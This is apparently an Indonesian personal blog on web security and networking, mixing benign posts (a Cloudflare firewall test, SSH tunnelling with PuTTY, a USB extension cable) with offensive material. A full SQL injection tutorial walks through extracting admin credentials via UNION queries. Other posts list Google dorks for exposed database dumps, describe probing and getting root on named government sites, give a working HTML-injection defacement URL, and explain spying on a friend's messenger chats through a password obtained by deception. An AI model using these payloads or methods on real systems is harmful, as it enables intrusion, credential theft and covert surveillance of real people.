Tampilkan postingan dengan label internet. Tampilkan semua postingan
Tampilkan postingan dengan label internet. Tampilkan semua postingan

Sabtu, 19 Februari 2022

Cloudflare Firewall Test - Tokodistributor.com

  Pada kesempatan ini saya akan coba sedikit share hasil pengalaman team kami dalam mencoba firewall yang tersedia dari cloudflare.com. Sedikitnya kami telah mencoba buat firewall self managed tapi nyatanya bot yang mencoba menyerang berubah-rubah secara IP Address dan juga User Agent.

Dalam kesempatan ini pula kami menggunakan NGINX sebagai web server dan custom gateway sendiri yang dibuat dengan bahasa pemograman Golang.


Di kasus ini pula kami tidak hanya menggunakan satu layer security tapi beberapa layer security. Dan yang terpenting melihat pola kerja bot.


1. Rate Limit dengan Internal Service

Sekali lagi saat kami mencoba membatasi IP yang masuk dan juga request terhadap service yang ada nyatanya ip tersebut berubah-ubah dan sulitnya bot tersebut tidak melakukan spamming yang begitu besar terhadap suatu endpoint. Bisa dilihat langsung dari gambar di bawah ini.




2. Ban User Agent?
Jawabannya tentu sangat tidak di rekomendasikan, dengan menggunakan ini setidaknya ada yang di korbankan. Beberapa diantara tentu saja dengan User Agent yang bisa jadi di kondisi sama tetapi user 'normal' maka akan merugikan user tersebut.


3. Anti Fraud Service

Tentu saja ini yang paling mendasar dari sebuah service yang kami buat, artinya kami mulai memperbaharui beberapa service kami, dan betul memang ini layer yang paling ampuh.


Tapi sekali lagi itu tidak mempengaruhi bot tersebut untuk tetap melancarkan aksinya. Sampai pada akhirnya untuk layer yang satu ini kami menggunakan cloudflare. Konsep sederhanannya DNS management kami yang memang menggunakan cloudflare dan mengaktifkan proxy dari cloudflare untuk sekaligus mengaktifkan beberapa fitur cloudflare.

Dan betul saja setelah saya coba seharian untuk melihat datanya, ini ampuh untuk filter layering dari tingkatan DNS service. Sekali lagi gambaran hanya berisikan konten yang berisikan pentingnya sisi firewall dari tingkatan sebuah service atau ops.



Dalam satu hari kurang, semenjak kita aktifkan (bisa dilihat pukul 18.00 sampai dengan 15.00 keesekokan harinya) setidaknya cloudflare sudah berhasil menghadang 2210 request dari bot yang coba menyerang. 



Berikut pula data yang disajikan dari cloudflare dari segi IP Address, User Agent, Geo Location IP, dan tentunya Provider Internet dari si bot berasal.


Dari sini pula kami dapat melihat lebih detail dari setiap serangan bot tersebut.


Jadi kesimpulan yang kami dapat, untuk firewall dari sisi proxy dns dari cloudflare ini sangat membantu kami dalam menghalau segala bentuk tindakan yang dapat merugikan.
Akhir kata saya mengucapkan terima kasih kepada team yang telah bekerja keras untuk kasus ini.


Best Regards,



M. Irfan Maulana

Co Founder Tokodistributor.com

Selasa, 14 Februari 2017

Mari Menjaga Keamanan Website

Tulisan ini sebenernya suatu kekesalan saya pribadi terhadap banyaknya developer web yang tidak mengindahkan pentingnya sebuah pengamanan  website.

Setelah beberapa pekan terakhir saya berseluncur khususnya di website-website Indonesia banyak sekali yang saya temukan. Dan akan sedikit saya share disini mengenai yang saya temukan disini, tapi sekali lagi sebelum saya share disini, jauh-jauh hari saya sudah mengingatkan webmasternya atau administratornya dengan contoh melalui email, log, dll.

Apa saja yang saya temukan:


  1. Menampilkan/Mengupload File yang menurut saya tidak semestinya di upload atau Fatal. Silahkan Klasifikan sendiri :p.
    Mau itu terpublish atau tidak. Contoh kasus kita mengupload file .sql(berisi dump database). Pertanyaan selanjutnya apakah file tersebut bisa diselancar dan dicari? Jawabannya kemungkinan bisa! Karena beberapa features mesin pencari google bisa kita gunakan untuk ini. Sekali lagi, mau itu penting, tidak penting, rahasia, atau apapun tolong jangan sekali-kali asal upload ke server yang akhirnya menjadi boomerang untuk web/server tersebut.

    Kita contohkan saja

    Google Dork:
    Inurl:go.id Filetype:sql Intext:INSERT
    Silakan dicoba! Atau kita rubah menjadi Inurl:.id 
  2. Memakai plugin yang memiliki vuln.
    Saya sarankan developer sebelum memasang plugin dalam sebuah website untuk mencari tahu dahulu apa ada atau tidak bugs dalam plugin tersebut. Dan saya sangat sarankan lagi untuk membaca dan memahami kembali coding dalam plugin tersebut, karena biasanya ini bisa menyasar kemana-mana. Atau bisa dibilang efeknya dominos dan berkaitan dengan lainnya.
  3. SQL Injection.
    Ini pun sama, biasanya banyak developer tidak mengindahkan dan memahami apa itu SQL injection. Biasanya dalam feature shared hosting sudah mulai ditutupi dengan plugin plugin untuk menutupi ini. Tapi sekali lagi saya harapkan developer pun menjaga agar code yang dibuatnya tidak memiliki potensi untuk dimasukan sesuatu yang akhirnya menjadi fatal.
    Biasanya bagi mereka yang masih belum memahami ini akhirnya database bisa tercuri dan fatalnya lagi efek ini berkelanjutan. Dalam beberapa kasus seorang yang telah melewati SQL Injection bisa memasuki page administrator dan memasang backdoor. Apa itu shell, atau bahkan bisa sampai root(user tertinggi) dan akhirnya saya tidak perlu memberi tahu lagi apa efeknya.
    Contoh paling yang sangat fatal adalah saya berhasil melihat isian database dari website sumselprov.go.id
    Tapi sekali lagi saya tidak melakukan apa-apa, saya hanya meneliti saja di dalamnya. Dan sudah saya ingatkan melalui beberapa kali email, jawabannya: tidak ada balasan :))
  4. Unrestricted File Upload
    Di beberapa kasus juga biasanya para developer tidak mengindahkan dan memahami code yang dibuatnya. Akhirnya, sekali lagi siapapun bisa mengupload backdoor kedalam server tersebut. Dan efeknya? Silahkan dicoba sendiri :D saya sudah jelaskan diatas.
Sekali lagi sebetulnya masih banyak, tapi hanya itu dulu yang saya sampaikan. Harapan dan saran untuk kita semua untuk menjaga keamanan website sederhanan sekali. Aktif dalam forum, update, baca, dan jangan makan gaji buta:))
Aktif dalam artian memiliki keinginan untuk terus memperbaharui apabila setelah di analisis/dilaporkan memiliki banyak kekurangan dan celah keamanan.
Beberapa kasus disini sekali lagi hanya sebagian besar, dan masih banyak yang belum saya ketahui dari berbagai aspek lainnya. Mungkin nanti dapat ditambahkan oleh teman-teman yang lain.

Jadi kesimpulannya adalah : Mari Menjaga Keamanan Website :)

Sedikit quotes untuk para web developer untuk lebih semangat dan bekreasi:

Most good programmers do programming not cause they expect to get paid/get adulation by the public, but cause it is fun to program. ~Linus Torvalds

Akhir kata, SALAM BERSAMA!! Hehehe



Sabtu, 14 Januari 2017

Mari berbangga dengan .ID dan teman-temannya

http://irfan.my.id/wp-content/uploads/2015/10/Bangga-Pakai-ID-Domain-Indonesia-PANDI.png

Transformasi, mungkin itulah kata yang tepat untuk kita sekarang. Mengapa? Karena setelah googling dan saya yang ketinggalan banyak berita :D mulai paham bahwa khususnya pemerintah melalui perangkat-perangkat pelaksananya mulai gencar untuk mengkampanyekan produk atau hal-hal yang berhubungan dengan negeri kita yaitu Indonesia.

Bagi temen-temen yang aktif dalam dunia pembangunan website contohnya. Pemerintah melalui Kementerian Komunikasi dan Informatika sejak 2016(kalau tidak salah) gencar dengan program 1juta.id-nya. Pada dasarnya program ini memberikan gratis 1 tahun domain ID ataupun turunananya (CO.ID/OR.ID dll) beserta hosting minimal 100MB. Dan lebih enaknya lagi kita bisa dibimbing dengan para profesional di bidang ini. Untuk informasi lebih lanjut silahkan kunjungi tautan tadi.

Selanjutnya, untuk temen-temen yang suka menggunakan shortener url biasanya ada bit.ly ataupun shortener yang lain coba kita gunakan salah satu produk lokal buatan temen-temen dari PANDI dengan tautan S.ID sebagai contoh saya pake S.ID/CCID untuk website cangkangsuuk-creative.id.

Apalagi ya...

Oh iya bagi teman-teman developer PHP juga yang biasa menggunakan framework, kita bisa juga gunain PANADAFRAMEWORK. Selain mudah, sederhana, sudah barang tentu ini juga buatan senior-senior kita dari dalam negeri.

Jadi kesimpulannya.. Sudah pasti kita semua paham kan, Mari berbangga dengan .ID dan teman-temannya..

Mungkin sekian dulu, akhir kata mohon maaf bila banyak kekurangan. Mungkin dilain waktu saya bisa tambahkan beberapa 'ajakan' ini. Terimakasih

Salam


Silahkan dibaca juga untuk menambah kebanggaan kita:

Selasa, 10 Maret 2015

Tren Underground Cyber Indonesia Berkurang?

Source: http://www.beritateknologi.com/wp-content/uploads/2013/11/hacker.jpg?8c7d5a
Kali ini sebenernya bukan tulisan yang serius-serius banget, dan dari dulu pun perasaan emang begini adanya. Judul diatas mungkin pertanyaan pribadi yang harusnya sih tak dijawab oleh diri sendiri. Toh jadinya nanti hanya sebuah luapan perasaan. Tapi tak apa, semoga senior-senior ataupun suhu-suhu bisa kembali meramaikan dunia Cyber di Indonesia.

Di jaman sekarang ini, apalagi perkembangan teknologi informasi semakin pesat tetapi sebaliknya forum-forum lokal kita semakin memudar. Apa sih pentingnya forum-forum ini? Mungkin dari teman-teman sendiri bisa mengetahui seberapa pentingnya sebuah forum. Sebuah bahan dijadikan topik pembicaraan dan dikaji dengan teman-teman. So simple, tapi entah kenapa yang kebetulan saya kadang membuka sebuah forum sebutlah dia '0x0' rasa-rasanya tak kunjung ada thread yang hangat. Padahal biasanya ini adalah awal dari sebuah informasi tadi bisa disebarkan, dikomentari ataupun ditanggapi, atau kita koreksi atau apapun itulah bentuknya.

Mungkin orang-orang sudah mulai bosan, sudah mulai merasa cerdas, atau mungkin sudah merasa punya kesibukan yang prioritasnya mungkin sulit terbagi lagi. Banyak hal, tapi pasti ada yang namanya regenerasi. Kenapa regenerasi itu penting? Oke anggaplah kita adalah sebuah generasi muda bangsa maka penting bagi sebuah generasi untuk memberikan arahan atau bimbingan terhadap generasi penerusnya. Mungkin ini juga pandangan pribadi saya, pada masa-masanya kala kemarin-kemarin para generasi sebelumnya 'mungkin' kurang membimbing generasi selanjutnya. Alasannya biasanya simple "dont learn to hack, hack to learn". Yup benar sekali. Dan ini tak pernah salah ;)

Seleksi Alam? Harusnya bukan seperti ini, mengapa? Pasti ada alasan-alasan tertentu agar sejarahnya tak pernah pudar. Pasti ada alasan-alasan tertenu agar adat-budaya-etika-moral-dan selanjutnya untuk tak pernah pudar. Bukan berarti seleksi alam membiarkan semuanya kembali kepada diri-mereka-mereka. Jadi seleksi alam menurut pandangan secara pribadi 'harusnya' bukan alasan yang tepat untuk menjawab pertanyaan ini.

Fasilitas atau Logistik? Untuk yang satu ini rasa-rasanya kembali lagi ke sebuah kelompok itu sendiri, apakah mereka krisis ide atau kreatifitasnya. Karena fasilitas dan logistik bisa terkecukupi dengan sumber daya yang ada, hanya tinggal cara dan mekanisme serta sistem yang jelas. Jadi fasilitas serta logistik sekali lagi bukan alasan yang tepat menurut pandangan pribadi saya,

Oh ya, sekali lagi ini adalah pandangan secara pribadi dan tak ada niatan untuk menjelek-jelakan kelompok/dunia underground di Indonesia.
Mungkin sekian dulu, semoga pandangan ini bisa dibaca oleh rekan-rekan yang lain. Semoga kita bisa bertukar pikiran, mencari solusi dari atas dasar judul di atas.

Regards.




Senin, 14 Mei 2012

SQLI DEPKOMINFO ? (Draft April 2009)


Berawal hanya karena suka main-main dengan keyword google, akhirnya aku pun mencoba untuk melakukan keyword yang sedikit nakal :P . Dengan kata kunci seperti layaknya seoarang anak yang cari-cari celah sql injection :D . Ok [ inurl:.php?id=10 site:depkominfo.go.id ] . Mengapa depkominfo ? tak ada alasin sih hanya sekedar coba-coba. Next ? dapat tidak ? oke dapat, meskipun yang keluar hanya satu dan juga hanya subdomain saja. Yah berharap untuk dapat menembusnya. hehe, lanjut dengan cek target. Tanda [ ' ] kuluncurkan ternyata hasilnya false. Ok awal yang baik. Karena tak percaya kucoba dengan AND 1=1 dan juga AND 1=2. Hasilnya cukup memuaskan.

Dari situ kita sudah bisa melanjutkan ke tahap berikutnya.
Okey cek kolom.
Karena aku lebih biasa dimulai dari [ 20 ] akhirnya kujalankan. Ternyata lebih !
Sampai kucari akhirnya dapat di nomor [ 22 ] . Nomor yang unik :P ( tak tahu juga sih,hehe)

Kolom telah dapat, akhirnya coba untuk menampilkan..
. . .
Dapat ! ternyata lumayan juga banyak nomor yang keluar. Tanpa basa-basi coba tuk menampilkan user dan versi mysqlnya :P .
Oh no !
root | versi 5 !!!!

Kamis, 19 Mei 2011

Membuat Tweetlonger di Aplikasi Webclient Sendiri

Oke guys, salam...
kali ini gue bakalan membahas tentang php. Ya langsung to the point aja, awalnya buat kalian yg suka buat apps for twitter seperti webclient mungkin udah banyak yang buat, tapi cukup untuk tweetlonger mungkin baru dikit. Kali ini gue bakalan bahas code-code yg dibuat sendiri untuk sinkron sama aplikasi sama yang kalian buat. Scriptnya gue ulik-ulik sendiri, tapi diambil dari beberapa sumber seperti php.net. Untuk itu ayo kita coba bareng.

*Bila kalian pake dabr dan dabr itu udh di host udah jalan tinggal dipake
**Bila belum udah banyak ko post-post yg membahas cara membuat webclient buat twitter

Nah semua telah berjalan..
Skrng logikanya seperti ini


Ini penjelasannya

Jika tweet lebih dari 140 karakter maka akan disimpan di database,
setelah itu tweet akan dibuka kembali dan akan mempunyai url, url tweet
yg lebih dari 140 karakter akan di short. Setelah mendapat short, tweet
yg 140 karakter akan dipotong *semisal menjadi 125* setelah dipotong tweet
akan disambungkan dengan hasil short url. Setelah semua bergabung maka akan langsung dikirim k twitter



Untuk logikanya kita sudah dapat tinggal scriptnya
Script pertama berada di bagian fungsi update untuk dabr.

Ini adalah scriptnya

function twitter_update() {
  twitter_ensure_post_action();
  $status = twitter_url_shorten(stripslashes(trim($_POST['status'])));
  if ($status) {
    $request = 'http://twitter.com/statuses/update.json';
   

    $total=strlen($status);
    if($total>=140)
    {
        mysql_connect("localhost","user","pass");
        mysql_select_db("database");
        $username=user_current_username();
        mysql_query("INSERT INTO archive (username,status,datetime) VALUES('$username','$status',''); ");
        $query=mysql_query("SELECT * FROM archive ORDER BY id DESC LIMIT 0,1");
        $hasil=mysql_fetch_array($query);
        $status2= substr($status,0,125);
        $longurl= 'http://www.test123.com/tweetlonger/index.php?id='.$hasil[id];
        $request = 'http://shorturl.com/?url=' . urlencode($longurl);
        $response = file_get_contents($request);
          $status3= twitter_url_shorten($status2 . " .." . $response);
    }
else
{
$status3=substr($status,0,140);
}
    $post_data = array('source' => 'Dabr', 'status' => $status3);
    $in_reply_to_id = (string) $_POST['in_reply_to_id'];
    if (is_numeric($in_reply_to_id)) {
      $post_data['in_reply_to_status_id'] = $in_reply_to_id;
    }
    $b = twitter_process($request, $post_data);
  }
  twitter_refresh($_POST['from'] ? $_POST['from'] : '');
}

Sedikit penjelasan
localhost=host
user=user
pass=pass
database=database
*dimasukan kedalam file twitter.php di fungsi sebelumnya dirubah dengan yg ini

Selanjutnya kita buat database dulu
Buat table dengan nama archive
Lalu buat column id, username,status, datetime

Setelah itu buat file untuk membuka status yg disimpan di database,
semisal saya memberi link www.test123.com/tweetlonger/index.php?id=

Isi file index.php adalah perintah php untuk menampilkan database ini. Kalo
anda tak mengerti nanti saya berikan contohnya

Setelah semua selesei dibuat
anda harus mencari tempat men-short url,
banyak layananan untuk ini. Anda dapat memilihnya sendiri..

Setelah semua telah terpasang tinggal dicoba apakah tweetlonger anda jalan atau tidak
Yang terpenting logikanya bener, ayo ayo dicoba :D
Semoga berguna :)

Kamis, 26 Maret 2009

Kurangnya Keamanan Pada Situs-Situs Pemeritah

Kemarin-kemarin saya tidak sengaja mencoba untuk berjalan-jalan. Masuk sana-sini dan coba saya liat-liat. Tak banyak yang ditemukan. Saya hanya mencoba sql injection. Namun banyak juga ternyata.
Screenshot :



Ini adalah sebagian kecil dari banyaknya situs pemerintah yang tidak baik pengamanannya.
Untuk admin-admin harap memperbaiki situsnya. Dari semua ini rata-rata melewati sql injection. Selamat Memperbaiki admin :D

Minggu, 08 Februari 2009

XSS di voiprakyat.or.id ?

Hari tidak ada kerjaan, surfing sana-sini sampe berteduh dulu di voiprakyat.or.id. Disana cuma baca-baca,nyoba sana nyoba sini. Akhirnya coba register dulu. Register pun selesai. Tidak ada yang aneh dari semuanya. Hanya saja saat melihat ke adress bar ada yang aneh. Apakah itu ? sesuai dengan judul kita kali ini. Kayanya bang admin meng-redirectkan dari register saat sukses. Kali ini kayanya
$_GET
nya diperintahkan untuk di print. Mungkin itu pendapat saya. Lebih jelasnya varibel dari
$_GET['err']
. Dengan coba-coba saya tembakan tag-tag html kedalamnya. Seperti

h1,br,dll.,dll
Namun saat saya cobakan dengan
script>alert('')/script>
nampaknya tidak jalan. Saya sendiri belum mengexplore lebih jauh.
url : http://voiprakyat.or.id/?inc=signup&op=user&err=%3Ch1%3Ehaduh%20ko%20web%20kelas%20profesional%20masih%20ada%20kaya%20gininya%20!!%20benerin%20donk%20om%20admin%20eh%20jgn%20lupa%20liat%20web%20saya%20di%20%3Ca%20href=%22http://www.juniorsev3n.net%22%3Ejuniorsev3n.net%3C/a%3E%3Cbr%3Ejuniorsev3n%20was%20here%3C/h1%3E%3CBR%3E%3CMARQUEE%3E%3CH1%3EJUNIORSEV3N%20SIGANTENGKALEM%3C/H1%3E%3C/MARQUEE%3E
screenshot :

Rabu, 28 Januari 2009

Memperpanjang kabel USB dengan disambung kabel UTP untuk WajanBolic

Sebenarnya saya juga pusing mau menulis artikel apa, namun setelah kemarin malas menulis blog akhirnya mempunyai ide untuk menulis tentang jaringan.
Kali ini saya hanya membahas tips dan trik bagi semuanya yang mau memperpanjang kabel usb wireless (radio usb atau dongle) meskipun sudah banyak di google tapi apa salahnya untuk share. Tutorial pembuatan wajan bolic sendiri sudah banyak. Anda bisa mencari di google. Maaf sekali karena contoh wajan bolic buatan saya tidak ada fotonya. Saya usahakan nanti akan beri foto. Membahas wajanbolic, saya memakai radio trendnet tew-444ub dan kabel memakai belden amerika untuk yang lainnya saya mengulik sendiri.hehe. Sekarang kita membahas tentang kabelnya.
Pertama siapkan dahulu kabel usb. Misal yang 1 meter, atau yang berapa aja bebas. Karena kita hanya menggunakan penyambungnya saja.
Kedua kita siapkan kabel utp, kalau saya sarankan sih mendingan memakai kabel belden amerika. Saya memakai kurang lebih 10 meter.
Untuk kabel sekiranya itu saja.
Bila ingin di solder bisa juga, tergantung andanya.
Inilah susunan kabelnya















USBUTP
MerahBiru
Coklat
Coklat Putih
PutihOrange
HijauHijau
HitamBiru Putih
Coklat Putih
Orange Putih

ya mungkin cuma itu saja yang bisa saya share, dan sebelumnya telah saya coba. Silahkan di coba.

Senin, 12 Januari 2009

SSH Tunneling with Putty

Sebenarnya ini tulisan saya ambil dari situs teman-teman saya dan saya sendiri termasuk di dalamnya (cangkangsuuk.org). Maaf juga tulisan ini dibuat dalam bahasa inggris, bukan karena tidak menghargai bahasa sendiri tapi karena ingin mencoba-coba menulis dalam bahasa inggris.

An SSH tunnel is an encrypted tunnel created through an SSH protocol connection. SSH tunnels may be used to tunnel unencrypted traffic over a network through an encrypted channel. For example, Windows machines can share files using the SMB protocol, which is not encrypted. If you were to mount a Windows filesystem remotely through the Internet, someone snooping on the connection could see your files. To mount the Windows filesystem securely, you can establish an SSH tunnel that routes all SMB traffic to the remote fileserver through an encrypted channel. Even though the SMB protocol itself is unencrypted it is secure because it travels through the encrypted SSH channel.

To create an SSH tunnel, an SSH client is configured to forward a specified local port to a port on the remote machine. Once the SSH tunnel has been established, the user can connect to the specified local port to access the network service. The local port need not be the same as the remote port.

SSH tunnels provide a means to bypass firewalls that prohibit certain Internet services provided that outgoing connections are allowed. For example, an organization may prohibit a user from accessing Internet web pages (port 80) directly without passing through the organization’s proxy filter which provides the organization a means of monitoring and controlling what the user sees through the web. The user may not wish to have their web traffic monitored or blocked by the organization’s proxy filter. If a user is able to connect to an external SSH server, it is possible for them to create an SSH tunnel to forward a given port on their local machine to port 80 on a remote web server. To access the remote web server the user would point their browser to http://localhost/.

Some SSH clients support dynamic port forwarding that allows the user to create a SOCKS 4/5 proxy. The user can configure his/her applications to use their local SOCKS proxy server. This is more flexible than creating an SSH tunnel to a single port as previously described. With SOCKS the user is not limited to connecting only to a predefined remote port and server.
(http://en.wikipedia.org/wiki/Tunneling_protocol#SSH_tunneling)

Before use SSH Tunneling,you must have an SSH account. Next, make sure Putty already installed on your computer. After sure Putty already installed, open Putty. Fill column Host Name (or IP address) with your account ssh host name. Then select SSH at menu. It will be out submenu Tunnels. Click the Tunnels submenu. Fill Source Port with 8080 but you are free to fill it with the numbers only provided that does not collide with any other port. Click Open. Then, you must fill the username and password. After successfully login, minimize Putty and open web browser. Then settings proxy with localhost and port 8080 or your fill number column Source Port on putty. And then, click SOCKS 5. Click OK.

Selasa, 30 Desember 2008

Share My PhpProxy

Kali ini saya hanya ingin sedikit share proxy di hosting saya. Meskipun sudah banyak bertebaran webproxy namun bagi yang ingin aman bisa menggunakan webproxy saya..hehe.
ini link proxynya :
http://www.juniorsev3n.net/tools/proxy/
untuk download bisa di
http://sourceforge.net/project/showfiles.php?group_id=110693
Namun bagi yang tidak suka webproxy saya sedikit share proxy lokal yaitu :
proxies.telkom.net.id:8080

Salam

irfan

Minggu, 21 Desember 2008

Ingin Mempunyai Pengalaman Berlomba

Pengalaman ? Itulah yang saya butuhkan sekarang,karena saat ini saya belum mempunyai jam terbang dalam bidang perlombaan apalagi lomba yang saya ikuti kali dalam membuat web.Saya sendiri dulu sangat menyukai dalam mengedit,menjiplak,dan membuat web.Namun semenjak pemasangan internet kembali saya pun mulai menikmati internet dan mulai lupa dikit-dikit dengan pemrograman seperti php.Dalam database pun demikian,mysql dikit2 lupa tapi untungnya g lupa2 amat. Dan sekarang adalah salat satu pembuktian saya dalam php dan mysql. Saya bergabung di ICT20 dalam mengikuti lomba ini. Lomba ini diadakan oleh dinamik4(Dies Natalies Mahasiswa Ilmu komputer UPI#4 2008) sesuai yang saya ambil dari sitenya di http://lcw.ostric.org/.

Sabtu, 22 November 2008

Memata-matai lewat shmessenger

Sudah lama saya tidak menulis blog,dan kali ini ada kemauan menulis :D.
Tidak perlu basa-basi kali ini saya hanya ingin menjelaskan sedikit saja.
Tapi cara ini anda memerlukan userid dan password pengguna shmessenger tersebut.Cara mendapatkannya bisa dengan social engineering.Yah contohnya seperti saya ke teman saya yang satu ini.Namanya ricky (hanya contoh).
j : ky,nginjem id sh lah
r : jang naon ?
j : jang ol blegug !
r : ouh
j : yueh id na (kulkas) passna(**)
j : nuhun ah

Padahal tujuan saya sebenarnya bukan untuk online saja.Tapi istilahnya untuk tracking.Maaf juga bahasa yang diatas adalah bahasa sunda.Lanjut..
Setelah mendapatkan userid dan password kita menuju ke website shmessenger.Urlnya http://shmessenger.ro lalu login.
dan akan muncul tampilan seperi ini.


Karena sebelumnya kita belum meng-save message di archive jadi kita setting dulu.klik settings dan ceklis save messages in archive.

Setelah di save kita hanya menunggu waktu:D.Setelah satu hari coba kita buka lagi.
Sekarang setelah login pilih archive dan protokolnya YMSG. Knp YMSG ? yah karena dia pakenya yahoo messenger.:D

Lanjut...

nah itu list yang make id tersebut..ternyata ada id saya juga.hehe:D
sekarang pilih salah satu.Mau yang mana terserah anda.hihi
Nah uda milih salah satu nanti akan ada id-id yang chat dengan id yang dipilih tersebut.
Contohnya


dan dengan begitu berakhir sudah tulisan untuk kali ini.
Salam hangat

juniorsev3n

Minggu, 07 September 2008

SQL Injection Tutorial Melalui recordID

*mysql

Sebelum membaca artikel ini sebaiknya anda membaca artikel tentang
http://juniorsev3n.blogspot.com/2008/07/script-php-from-dreameaver-8.html
karena ini menerangkan bagaimana sql injection ini bisa terjadi.
Saya beri tahu lagi bahwa bug nya terdapat pada
WHERE id=$recordID
untuk id itu tidak selalu id tapi tergantung pada sang webmaster.
Langsung aja.

Langkah pertama adalah mengecek bug tersebut.
dengan memberikan tanda single quote ( ' ) di recordID
Semisal :
news.php?recordID=1'
Nah apabila tampak pesan error berarti kita bisa melanjutkannya.

Langkah kedua adalah mengecek column yang berada di table tersebut
dengan cara menggunakan perintah ORDER BY
Semisal :
news.php?recordID=1+ORDER+BY+1/*
nah apabila nilainya true maka column/field tersebut ada.
artinya kita harus mencari tahu ada berapa nilai yang true !
untuk mencari nilai tinggal ganti saja angka satu tersebut.
Semisal :
news.php?recordID=1+ORDER+BY+2/*
news.php?recordID=1+ORDER+BY+3/*
Nah apabila nilainya masih true berarti column/field itu ada.Dan apabila nilainya
sudah false berarti column/field itu tidak ada.Semisal column/field hanya ada 3 saat kita memasukan angka 4 maka akan muncul pesan error di halaman tersebut.
Note : /* adalah tag comment pada SQL dan kita memakai ini untuk tidak mengaktifkan perintah setelah tag comment.
Lain-lain tag comment : // , -- , # ,etc


Langka ketiga adalah menampilkan column/field yang ditampilkan.
dengan menggunakan perintah UNION ALL SELECT
semisal :
news.php?recordID=-1+UNION+ALL+SELECT+1,2,3/*
Q : Mengapa harus menggunakan -1 ?
A : tidak selalu -1 tetapi yang nilainya false.
Nah dengan menggunakan perintah itu maka akan keluar nomor2 di halaman.
Itu menandakan nomor2 itulah yang di outputkan.
Dengan demikian kita menggunakan fungsi2 di nomor2 yang dikeluarkan.
semisal nomor yang dikeluarkan adalah 2 dan 3 . Berarti fungsi2 disimpan di nomor 2 dan 3 atau salah satunya. Kalau kita memasukin di nomor yang tidak ditampilkan maka yang diperintahkan tidak akan keluar.

Langkah selanjutnya adalah memberikan fungsi2 mysql.
dengan memberikan version() , user() , database() ,etc
nah untuk mengecek version mysql masukan fungsi version()
untuk melihat user yang digunakan masukan fungsi user()
untuk melihat nama database yang digunakan masukan fungsi database()
Semisal :
news.php?recordID=-1+UNION+ALL+SELECT+1,version(),user()/*
Nah di halaman akan menampilkan version mysql dan user nya.
Semisal versionnya 5 keatas dan usernya bebas
Maka kita bisa lanjutkan tetapi apabila versionnya 4 atas 5 kebawah sebaiknya cari target yang lain.
NOTE : apabila usernya root , berbahagialah. karena root adalah user yang tertinggi.Kita bisa menampilkan user2 dan password mysql.
Nah selanjutnya adalah menampilkan table2 yang ada.
NOTE : supaya lebih ringkas kita tampilkan saja table2 yang hanya ada di database
Semisal :
news.php?recorID=-1+UNION+ALL+SELECT+1,group_concat(table_name),3+
FROM+information_schema.tables+WHERE+table_schema=database()/*
group_concat adalah fungsi untuk menampilkan semuanya yang ada di column/field itu.
Anda bisa menggunakan fungsi2 lain sesuai kebutuhan. concat(),concat_ws(),etc.
table_name adalah column/field yang terdapat di table tables.
information_shema adalah database tempat penyimpanan data2 skema.
tables adalah table yang bernama tables tempat penyimpanan nama2 table tersebut.
nah dengan demikian di halaman akan muncul nama2 table yang hanya ada di database saja.
untuk menampilkan semuanya anda hanya perlu menghilangkan WHERE table_schema=database()

Apabila terdapat table2 yang berbau tempat penyimpanan database user/admin anda ingat2 nama table itu atau copy paste saja ke Applications->Aksesoris->Penyunting Berkas Teks
hehe,,promosi dikit [ ubuntu 8.04 ]

Nah apabila sudah mendapatkan nama2 table selanjutnya adalah mencari nama2 column/field.
Semisal :
news.php?recordID=-1+UNION+ALL+SELECT+1,group_concat(column_name),3+
FROM+information_schema.columns+WHERE+table_schema=database()/*
Nah maka akan menampilkan column/field yang tedapat di database.
Apabila mendapat yang berbau username atau password ya itulah berarti column yang akan kita keluarkan.tetapi apabila sukses dengan menggunakan perintah semisal :
news.php?recordID=-1+UNION+ALL+SELECT+1,group_concat(column_name),3+
FROM+information_schema.columns+WHERE+table_name='user'/*
user adalah contoh table tempat penyimpanan data2 user dan password.
Maka akan keluar column yang berada di table user.
Tapi kalo muncul pesan eror sebaiknya guna cara yang tadi.
Nah apabila kita sudah mendapat nama2 column/field dan table langkah selanjutnya adalah mengeluarkan data username dan password admin.

Semisal :
news.php?recordID=-1+UNION+ALL+SELECT+1,
group_concat(concat(username,0x3a,password)),3+FROM+user/
nah maka akan tampil semua data username dan password di table user
Apabila hasilnya enkripsi anda harus mengcracknya dulu
Apabila password nya bukan enkripsi yang berbahagialah karena tidak usah
cape2 mengcracknya.
Sekarang anda tinggal login ke halaman adminnya.

Ya,,mungkin cukup sekian dulu yang bisa saya tulis
mungkin banyak kesalahan dan kekurangan jadi saya mohon maaf.
Correct Me IF I'm Wrong (CMIIW)
hehe

Salam hangat,
juniorsev3n

Selasa, 02 September 2008

Connection PPPoE at Ubuntu 8.04

AH,,akhirnya bisa juga gw konek di ubuntu
Kali ini pengalaman gw yang secara ngasal2 dan akhirnya bisa
Langsung aja
Cara koneksi PPoE di ubuntu :

pertama masuk network setting

















trus properties yg gambar telepon
nah isi deh textboxnya
dan ini adalah contohnya



















Sesudah setting tersebut kita tinggal konek deh
selese deh...

Salam
juniorsev3n

Sabtu, 09 Agustus 2008

My New Domain

Walau hanya sekedar subdomain tpi berarti banget dehh..
hehehe,,thx untuk pirradoze aka pizzadox619 heuheu dan
juga untuk blank_alpha yg uda masang link gw...
link terbaru gw ini.. dan beberapa subdomain lainnya
*maaf kalo ada yg g aktif
http://juniorsev3n.sman20bandung.sch.id
http://juniorsev3n.madiunkab.go.id-->>wakakakak tau sendiri lah ini uda lama tpi lom di patch

rencananya di subdomain sman20 gw hanya mu masukin shoutbox ,,hihi
dan insya allah nanti gw mu beli domain sendiri..
hihi.doain aje yee

thx
salam hangat
juniorsev3n

Rabu, 30 Juli 2008

Script PHP&MYSQL from Dreameaver 8

Ada apa ?
hmmm
[ ini akan berhasil bila magic_quotes_gpc = off dan version 5 ]
Pertama-tama script paketan dari dreameaver 8 ini simple dan cukup aman.
Tapi setelah lama mendalami ternyata setiap manusia pasti mempunyai kesalahan ..
Hehehe
Yah
Setelah masuk
-insert
-Apllication Objects

dan gw coba satu2..
sambil mendalami script tersebut gw coba menganalisis
saat tengah2 coba masuk ke Master Detail Page Set
coba pake id untuk linknya
pasti get defaultnya recordID
otomatis kalau misalkan anda membuat aplikasi berita dan ada detailnya
misalkan yg gw bwt news.php
nah pasti detailnya contohnya
news_detail.php?recordID=[idnya]
itu contohnya
tapi justru get recordID ini yg tidak terfilter dengan baik
misalkan scriptnya seperti ini

$recordID=$_GET['recordID'];
$query_DetailRS1 = "SELECT * FROM hal WHERE id = $recordID";


Apa yg terjadi ??
okeyzz uda pada tau ??
yoi,,sql injection
dan ruginya kalo version 5,,wuihh haha
untuk sql injection step by step
